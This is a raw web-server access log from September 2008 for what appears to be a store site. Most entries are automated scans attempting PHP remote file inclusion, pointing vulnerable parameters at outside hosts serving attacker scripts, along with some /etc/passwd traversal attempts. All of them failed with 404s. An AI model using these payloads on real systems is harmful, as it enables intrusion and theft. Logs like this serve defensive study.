200.93.147.155 - - [09/Sep/2008:00:00:17 -0400] "GET /errors.php?error=http://www.geocities.com/linasuci/test.txt??? HTTP/1.1" 404 208 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
200.93.147.155 - - [09/Sep/2008:00:00:17 -0400] "GET /logs/errors.php?error=http://www.geocities.com/linasuci/test.txt??? HTTP/1.1" 404 213 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
209.59.12.99 - - [09/Sep/2008:00:04:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
89.111.176.9 - - [09/Sep/2008:00:06:21 -0400] "GET /logs/access_log.Q108061400/tools/send_reminders.php?noSet=0&includedir=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
141.89.66.2 - - [09/Sep/2008:00:07:18 -0400] "GET /index.php?pagina=http://www.tabernus.com/downloads/response.txt???? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
141.89.66.2 - - [09/Sep/2008:00:07:18 -0400] "GET /logs/error_log.Q108072700/index.php?pagina=http://www.tabernus.com/downloads/response.txt???? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
141.89.66.2 - - [09/Sep/2008:00:07:23 -0400] "GET /logs/index.php?pagina=http://www.tabernus.com/downloads/response.txt???? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
141.89.66.2 - - [09/Sep/2008:00:07:29 -0400] "GET /logs/index.php?pagina=http://www.tabernus.com/downloads/response.txt???? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
141.89.66.2 - - [09/Sep/2008:00:07:29 -0400] "GET /logs/error_log.Q108070500/index.php?pagina=http://www.tabernus.com/downloads/response.txt???? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
141.89.66.2 - - [09/Sep/2008:00:07:32 -0400] "GET /logs/error_log.Q108072700/index.php?pagina=http://www.tabernus.com/downloads/response.txt???? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
141.89.66.2 - - [09/Sep/2008:00:07:32 -0400] "GET /index.php?pagina=http://www.tabernus.com/downloads/response.txt???? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
141.89.66.2 - - [09/Sep/2008:00:07:38 -0400] "GET /logs/error_log.Q108070500/index.php?pagina=http://www.tabernus.com/downloads/response.txt???? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
87.117.219.154 - - [09/Sep/2008:00:09:22 -0400] "GET /logs/error_log.Q108082000/modules/agendax/addevent.inc.php?agendax_path=http://www.seomen.com/amember/id.txt??? HTTP/1.1" 404 256 "-" "libwww-perl/5.810"
87.117.219.154 - - [09/Sep/2008:00:09:22 -0400] "GET /modules/agendax/addevent.inc.php?agendax_path=http://www.seomen.com/amember/id.txt??? HTTP/1.1" 404 230 "-" "libwww-perl/5.810"
87.117.219.154 - - [09/Sep/2008:00:09:22 -0400] "GET /logs/modules/agendax/addevent.inc.php?agendax_path=http://www.seomen.com/amember/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.810"
209.59.12.99 - - [09/Sep/2008:00:09:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.117.219.154 - - [09/Sep/2008:00:09:31 -0400] "GET /logs/error_log.Q108052900/modules/agendax/addevent.inc.php?agendax_path=http://www.seomen.com/amember/id.txt??? HTTP/1.1" 404 256 "-" "libwww-perl/5.810"
70.84.108.34 - - [09/Sep/2008:00:11:27 -0400] "GET /logs/error_log.Q108082500//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://leicht-und-fit.de/webnews/parse/id2.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
70.84.108.34 - - [09/Sep/2008:00:11:28 -0400] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://leicht-und-fit.de/webnews/parse/id2.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.810"
70.84.108.34 - - [09/Sep/2008:00:11:33 -0400] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://leicht-und-fit.de/webnews/parse/id2.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.810"
209.59.12.99 - - [09/Sep/2008:00:14:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
207.210.89.58 - - [09/Sep/2008:00:16:42 -0400] "GET /logs/error_log.Q108061300/index.php?pageurl=http://www.andreysemenov.ru/gb/images/matheus/bot/alb?? HTTP/1.1" 404 233 "-" "libwww-perl/5.811"
207.210.89.58 - - [09/Sep/2008:00:16:42 -0400] "GET /index.php?pageurl=http://www.andreysemenov.ru/gb/images/matheus/bot/alb?? HTTP/1.1" 404 207 "-" "libwww-perl/5.811"
207.210.89.58 - - [09/Sep/2008:00:16:42 -0400] "GET /logs/index.php?pageurl=http://www.andreysemenov.ru/gb/images/matheus/bot/alb?? HTTP/1.1" 404 212 "-" "libwww-perl/5.811"
72.9.248.162 - - [09/Sep/2008:00:16:55 -0400] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.teshkeelcomics.com/modules/PNphpBB2/images/posticons/hack-id.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.810"
207.210.89.58 - - [09/Sep/2008:00:16:59 -0400] "GET /logs/error_log.Q108060700/index.php?pageurl=http://www.andreysemenov.ru/gb/images/matheus/bot/alb?? HTTP/1.1" 404 233 "-" "libwww-perl/5.811"
68.251.47.205 - - [09/Sep/2008:00:17:00 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L8F5677200BE518006DA905K+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
68.251.47.205 - - [09/Sep/2008:00:16:58 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L8F5677200BE518006DA905K+M37+ENG HTTP/1.1" 200 75294 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L8F56772905653800446905K+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
68.251.47.205 - - [09/Sep/2008:00:17:01 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L8F56A3210125E80099E905V+M37+ENG HTTP/1.1" 200 37458 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L8F5677200BE518006DA905K+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
78.159.111.131 - - [09/Sep/2008:00:17:09 -0400] "GET /logs/error_log.Q108052700/modules/agendax/addevent.inc.php?agendax_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
78.159.111.131 - - [09/Sep/2008:00:17:12 -0400] "GET /modules/agendax/addevent.inc.php?agendax_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 230 "-" "libwww-perl/5.805"
78.159.111.131 - - [09/Sep/2008:00:17:14 -0400] "GET /logs/modules/agendax/addevent.inc.php?agendax_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
78.159.111.131 - - [09/Sep/2008:00:17:18 -0400] "GET /logs/error_log.Q108052700/modules/agendax/addevent.inc.php?agendax_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
74.200.91.47 - - [09/Sep/2008:00:17:18 -0400] "GET /logs/error_log.Q108052300/port.php?content=http://cia.uabc.mx/images/raid.txt???? HTTP/1.1" 404 232 "-" "libwww-perl/5.810"
74.200.91.47 - - [09/Sep/2008:00:17:18 -0400] "GET /port.php?content=http://cia.uabc.mx/images/raid.txt???? HTTP/1.1" 404 206 "-" "libwww-perl/5.810"
74.200.91.47 - - [09/Sep/2008:00:17:18 -0400] "GET /logs/port.php?content=http://cia.uabc.mx/images/raid.txt???? HTTP/1.1" 404 211 "-" "libwww-perl/5.810"
74.200.91.47 - - [09/Sep/2008:00:17:18 -0400] "GET /logs/error_log.Q108051800/port.php?content=http://cia.uabc.mx/images/raid.txt???? HTTP/1.1" 404 232 "-" "libwww-perl/5.810"
74.200.91.47 - - [09/Sep/2008:00:17:22 -0400] "GET /logs/error_log.Q108062000/port.php?content=http://cia.uabc.mx/images/raid.txt???? HTTP/1.1" 404 232 "-" "libwww-perl/5.810"
74.200.91.47 - - [09/Sep/2008:00:17:22 -0400] "GET /logs/error_log.Q108052300/port.php?content=http://cia.uabc.mx/images/raid.txt???? HTTP/1.1" 404 232 "-" "libwww-perl/5.810"
74.200.91.47 - - [09/Sep/2008:00:17:22 -0400] "GET /port.php?content=http://cia.uabc.mx/images/raid.txt???? HTTP/1.1" 404 206 "-" "libwww-perl/5.810"
74.200.91.47 - - [09/Sep/2008:00:17:24 -0400] "GET /logs/error_log.Q108062000/port.php?content=http://cia.uabc.mx/images/raid.txt???? HTTP/1.1" 404 232 "-" "libwww-perl/5.810"
78.159.111.131 - - [09/Sep/2008:00:17:25 -0400] "GET /logs/modules/agendax/addevent.inc.php?agendax_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
74.200.91.47 - - [09/Sep/2008:00:17:35 -0400] "GET /logs/error_log.Q108051800/port.php?content=http://cia.uabc.mx/images/raid.txt???? HTTP/1.1" 404 232 "-" "libwww-perl/5.810"
68.251.47.205 - - [09/Sep/2008:00:17:31 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L8F56A3240F85B800996905V+M37+ENG HTTP/1.1" 200 35819 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L8F56A3210125E80099E905V+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
89.111.176.57 - - [09/Sep/2008:00:17:38 -0400] "GET /logs/access_log.Q108081400/show_news.php?cutepath=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
89.111.176.57 - - [09/Sep/2008:00:17:38 -0400] "GET /show_news.php?cutepath=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 211 "-" "libwww-perl/5.805"
68.251.47.205 - - [09/Sep/2008:00:17:40 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L8F56A3230FB5C800BF7905V+M37+ENG HTTP/1.1" 200 37197 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L8F56A3240F85B800996905V+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
89.111.176.57 - - [09/Sep/2008:00:17:42 -0400] "GET /logs/show_news.php?cutepath=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
209.97.201.206 - - [09/Sep/2008:00:18:17 -0400] "GET /logs/error_log.Q108082500//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://leicht-und-fit.de/webnews/parse/arab.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
209.97.201.206 - - [09/Sep/2008:00:18:22 -0400] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://leicht-und-fit.de/webnews/parse/arab.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.810"
209.97.201.206 - - [09/Sep/2008:00:18:24 -0400] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://leicht-und-fit.de/webnews/parse/arab.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.810"
78.159.111.131 - - [09/Sep/2008:00:18:30 -0400] "GET /logs/error_log.Q108082000/modules/agendax/addevent.inc.php?agendax_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
78.159.111.131 - - [09/Sep/2008:00:18:31 -0400] "GET /logs/error_log.Q108082000/modules/agendax/addevent.inc.php?agendax_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
89.186.1.54 - - [09/Sep/2008:00:18:59 -0400] "GET /logs/error_log.Q108071900//poll/booth.php?include_path=http://www.geocities.com/cute_j3ny/id.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.800"
87.117.238.16 - - [09/Sep/2008:00:19:00 -0400] "GET /logs/error_log.Q108061300/index.php?pageurl=http://www.andreysemenov.ru/gb/images/matheus/bot/alb?? HTTP/1.1" 404 233 "-" "libwww-perl/5.810"
87.117.238.16 - - [09/Sep/2008:00:19:02 -0400] "GET /index.php?pageurl=http://www.andreysemenov.ru/gb/images/matheus/bot/alb?? HTTP/1.1" 404 207 "-" "libwww-perl/5.810"
87.117.238.16 - - [09/Sep/2008:00:19:02 -0400] "GET /logs/error_log.Q108061300/index.php?pageurl=http://www.andreysemenov.ru/gb/images/matheus/bot/alb?? HTTP/1.1" 404 233 "-" "libwww-perl/5.810"
87.117.238.16 - - [09/Sep/2008:00:19:03 -0400] "GET /logs/index.php?pageurl=http://www.andreysemenov.ru/gb/images/matheus/bot/alb?? HTTP/1.1" 404 212 "-" "libwww-perl/5.810"
87.117.238.16 - - [09/Sep/2008:00:19:07 -0400] "GET /index.php?pageurl=http://www.andreysemenov.ru/gb/images/matheus/bot/alb?? HTTP/1.1" 404 207 "-" "libwww-perl/5.810"
87.117.238.16 - - [09/Sep/2008:00:19:08 -0400] "GET /logs/index.php?pageurl=http://www.andreysemenov.ru/gb/images/matheus/bot/alb?? HTTP/1.1" 404 212 "-" "libwww-perl/5.810"
87.117.238.16 - - [09/Sep/2008:00:19:22 -0400] "GET /logs/error_log.Q108060700/index.php?pageurl=http://www.andreysemenov.ru/gb/images/matheus/bot/alb?? HTTP/1.1" 404 233 "-" "libwww-perl/5.810"
87.117.238.16 - - [09/Sep/2008:00:19:26 -0400] "GET /logs/error_log.Q108060700/index.php?pageurl=http://www.andreysemenov.ru/gb/images/matheus/bot/alb?? HTTP/1.1" 404 233 "-" "libwww-perl/5.810"
209.59.12.99 - - [09/Sep/2008:00:19:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
70.85.201.66 - - [09/Sep/2008:00:19:49 -0400] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.alpenverein-bb.de/service/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
70.85.201.66 - - [09/Sep/2008:00:19:49 -0400] "GET /logs/access_log.Q108062700//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.alpenverein-bb.de/service/id.txt??? HTTP/1.1" 404 262 "-" "libwww-perl/5.811"
70.85.201.66 - - [09/Sep/2008:00:19:50 -0400] "GET /logs/access_log.Q108050200//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.alpenverein-bb.de/service/id.txt??? HTTP/1.1" 404 262 "-" "libwww-perl/5.811"
70.85.201.66 - - [09/Sep/2008:00:19:50 -0400] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.alpenverein-bb.de/service/id.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.811"
74.6.17.183 - - [09/Sep/2008:00:18:45 -0400] "GET /logs/access_log.Q107101600 HTTP/1.0" 200 3736485 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
66.147.239.184 - - [09/Sep/2008:00:20:11 -0400] "GET /logs/error_log.Q108050300//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.itel.cl/id.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.810"
66.147.239.184 - - [09/Sep/2008:00:20:11 -0400] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.itel.cl/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.810"
66.147.239.184 - - [09/Sep/2008:00:20:11 -0400] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.itel.cl/id.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.810"
66.147.239.184 - - [09/Sep/2008:00:20:59 -0400] "GET /logs/error_log.Q108021700//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.itel.cl/id.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.810"
70.84.108.34 - - [09/Sep/2008:00:21:10 -0400] "GET /logs/error_log.Q108041100//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://leicht-und-fit.de/webnews/parse/id2.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
89.218.85.18 - - [09/Sep/2008:00:21:22 -0400] "GET /logs/access_log.Q108070300/errors.php?error=http://163.26.12.232/aDu/idku.jpg?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
89.218.85.18 - - [09/Sep/2008:00:22:17 -0400] "GET /logs/access_log.Q108070300/errors.php?error=http://163.26.12.232/aDu/idku.jpg?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
89.108.67.220 - - [09/Sep/2008:00:23:59 -0400] "GET /logs/access_log.Q108081400/show_news.php?cutepath=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 238 "-" "libwww-perl/5.812"
89.108.67.220 - - [09/Sep/2008:00:24:03 -0400] "GET /show_news.php?cutepath=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 211 "-" "libwww-perl/5.812"
89.108.67.220 - - [09/Sep/2008:00:24:05 -0400] "GET /logs/show_news.php?cutepath=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 216 "-" "libwww-perl/5.812"
151.64.161.2 - - [09/Sep/2008:00:24:07 -0400] "GET /logs/access_log.Q108081300///modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.montefarno.it/////modules/icontent/include/wysiwyg/idv6.txt?? HTTP/1.1" 404 283 "-" "Mozilla/3.0 (OS/2; U)"
151.64.161.2 - - [09/Sep/2008:00:24:09 -0400] "GET ///modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.montefarno.it/////modules/icontent/include/wysiwyg/idv6.txt?? HTTP/1.1" 404 256 "-" "Mozilla/3.0 (OS/2; U)"
209.59.12.99 - - [09/Sep/2008:00:24:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
151.64.161.2 - - [09/Sep/2008:00:24:37 -0400] "GET ///modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.montefarno.it/////modules/icontent/include/wysiwyg/idv6.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
151.64.161.2 - - [09/Sep/2008:00:24:39 -0400] "GET /logs///modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.montefarno.it/////modules/icontent/include/wysiwyg/idv6.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
151.64.161.2 - - [09/Sep/2008:00:24:41 -0400] "GET /logs/error_log.Q108081300///modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.montefarno.it/////modules/icontent/include/wysiwyg/idv6.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
151.64.161.2 - - [09/Sep/2008:00:25:08 -0400] "GET /logs/access_log.Q108081300///modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.montefarno.it/////modules/icontent/include/wysiwyg/idv6.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
89.111.176.57 - - [09/Sep/2008:00:26:23 -0400] "GET /logs/error_log.Q108082500/show_news.php?cutepath=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
200.93.147.155 - - [09/Sep/2008:00:26:32 -0400] "GET /logs/access_log.Q108082700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 277 "-" "libwww-perl/5.805"
200.93.147.155 - - [09/Sep/2008:00:26:32 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
200.93.147.155 - - [09/Sep/2008:00:26:33 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
213.218.141.5 - - [09/Sep/2008:00:27:13 -0400] "GET /logs/access_log.Q108081400/show_news.php?cutepath=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 238 "-" "libwww-perl/5.812"
213.218.141.5 - - [09/Sep/2008:00:27:13 -0400] "GET /show_news.php?cutepath=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 211 "-" "libwww-perl/5.812"
213.218.141.5 - - [09/Sep/2008:00:27:14 -0400] "GET /logs/show_news.php?cutepath=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 216 "-" "libwww-perl/5.812"
70.85.201.66 - - [09/Sep/2008:00:27:17 -0400] "GET /logs/error_log.Q108050300//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 261 "-" "libwww-perl/5.811"
70.85.201.66 - - [09/Sep/2008:00:27:18 -0400] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
70.85.201.66 - - [09/Sep/2008:00:27:20 -0400] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 240 "-" "libwww-perl/5.811"
74.6.17.183 - - [09/Sep/2008:00:29:28 -0400] "GET /logs/error_log.Q107082500 HTTP/1.0" 200 33274 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [09/Sep/2008:00:29:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.6.17.183 - - [09/Sep/2008:00:31:07 -0400] "GET /images/Office%20Supply/Thumbs.db HTTP/1.0" 200 60416 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
195.39.5.203 - - [09/Sep/2008:00:31:55 -0400] "GET /logs/error_log.Q108062200/http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 268 "-" "libwww-perl/5.805"
195.39.5.203 - - [09/Sep/2008:00:31:56 -0400] "GET /http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
195.39.5.203 - - [09/Sep/2008:00:31:57 -0400] "GET /logs/http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
89.108.67.220 - - [09/Sep/2008:00:32:23 -0400] "GET /logs/error_log.Q108082500/show_news.php?cutepath=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 237 "-" "libwww-perl/5.812"
195.39.5.203 - - [09/Sep/2008:00:32:28 -0400] "GET /logs/error_log.Q108062200/http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 268 "-" "libwww-perl/5.805"
195.39.5.203 - - [09/Sep/2008:00:32:29 -0400] "GET /http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
195.39.5.203 - - [09/Sep/2008:00:32:33 -0400] "GET /logs/http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
209.172.55.178 - - [09/Sep/2008:00:32:35 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://ccsa.edu.sv/rhs/bot.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
209.172.55.178 - - [09/Sep/2008:00:32:35 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://ccsa.edu.sv/rhs/bot.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
195.39.5.203 - - [09/Sep/2008:00:33:02 -0400] "GET /logs/access_log.Q108061300/http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
195.39.5.203 - - [09/Sep/2008:00:33:20 -0400] "GET /logs/access_log.Q108061300/http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
213.218.141.5 - - [09/Sep/2008:00:34:11 -0400] "GET /logs/error_log.Q108081400/show_news.php?cutepath=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 237 "-" "libwww-perl/5.812"
209.59.12.99 - - [09/Sep/2008:00:34:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
195.39.5.203 - - [09/Sep/2008:00:34:53 -0400] "GET /logs/error_log.Q108062200/http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 268 "-" "libwww-perl/5.805"
195.39.5.203 - - [09/Sep/2008:00:34:54 -0400] "GET /http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
195.39.5.203 - - [09/Sep/2008:00:34:55 -0400] "GET /logs/http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
62.75.170.176 - - [09/Sep/2008:00:35:08 -0400] "GET /lostpasswd.php?env[include_prefix]=http://www.milf2gilf.com/forums/skin_acp/IPB2_Standard/acp_skin_html/index.php/extreme/busk.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
62.75.170.176 - - [09/Sep/2008:00:35:09 -0400] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.milf2gilf.com/forums/skin_acp/IPB2_Standard/acp_skin_html/index.php/extreme/busk.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
195.39.5.203 - - [09/Sep/2008:00:35:34 -0400] "GET /logs/access_log.Q108061300/http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
87.244.220.2 - - [09/Sep/2008:00:35:45 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.milf2gilf.com/forums/skin_acp/IPB2_Standard/acp_skin_html/index.php/extreme/busk.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
87.244.220.2 - - [09/Sep/2008:00:35:46 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.milf2gilf.com/forums/skin_acp/IPB2_Standard/acp_skin_html/index.php/extreme/busk.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
74.6.17.183 - - [09/Sep/2008:00:36:38 -0400] "GET /images/_notes/contact_fax.jpg.mno HTTP/1.0" 200 250 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.17.183 - - [09/Sep/2008:00:36:23 -0400] "GET /logs/access_log.Q107061500 HTTP/1.0" 200 2074194 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
62.87.154.41 - - [09/Sep/2008:00:37:06 -0400] "GET /logs/access_log.Q108082400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://borneo.siteburg.com/error.txt???? HTTP/1.1" 404 284 "-" "libwww-perl/5.803"
62.87.154.41 - - [09/Sep/2008:00:37:06 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://borneo.siteburg.com/error.txt???? HTTP/1.1" 404 257 "-" "libwww-perl/5.803"
62.87.154.41 - - [09/Sep/2008:00:37:09 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://borneo.siteburg.com/error.txt???? HTTP/1.1" 404 262 "-" "libwww-perl/5.803"
74.6.17.183 - - [09/Sep/2008:00:36:22 -0400] "GET /logs/access_log.Q108050200 HTTP/1.0" 200 3460546 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
